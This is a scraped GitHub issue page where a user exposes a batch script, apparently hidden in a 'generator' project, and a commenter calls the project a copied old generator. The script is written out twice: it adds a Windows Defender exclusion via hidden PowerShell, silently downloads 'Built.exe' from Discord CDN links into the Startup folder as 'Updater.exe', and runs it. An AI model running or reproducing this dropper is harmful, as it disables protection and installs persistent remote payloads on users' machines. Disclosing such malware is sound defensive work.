We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
powershell -w hidden -c Add-MpPreference -ExclusionPath ""
@echo off setlocal
set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176190901970796564/Built.exe" set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"
if exist "%DEST%" del "%DEST%"
curl --silent --output "%DEST%" "%URL%"
if %errorlevel% neq 0 ( exit /b %errorlevel% )
call "%DEST%"
set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176181839065526402/Built.exe" set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"
@echo off cd /d %~dp0
pip3 install -r requirements.txt
really?
The text was updated successfully, but these errors were encountered:
yeah no wonder it's broken when it's a literal copy of a uploaded generator some months ago with just text changed and well this lmao
Sorry, something went wrong.
No branches or pull requests
powershell -w hidden -c Add-MpPreference -ExclusionPath ""
@echo off
setlocal
set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176190901970796564/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"
if exist "%DEST%" del "%DEST%"
curl --silent --output "%DEST%" "%URL%"
if %errorlevel% neq 0 (
exit /b %errorlevel%
)
call "%DEST%"
@echo off
setlocal
set "URL=https://cdn.discordapp.com/attachments/973337617057869825/1176181839065526402/Built.exe"
set "DEST=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe"
if exist "%DEST%" del "%DEST%"
curl --silent --output "%DEST%" "%URL%"
if %errorlevel% neq 0 (
exit /b %errorlevel%
)
call "%DEST%"
@echo off
cd /d %~dp0
pip3 install -r requirements.txt
really?
The text was updated successfully, but these errors were encountered: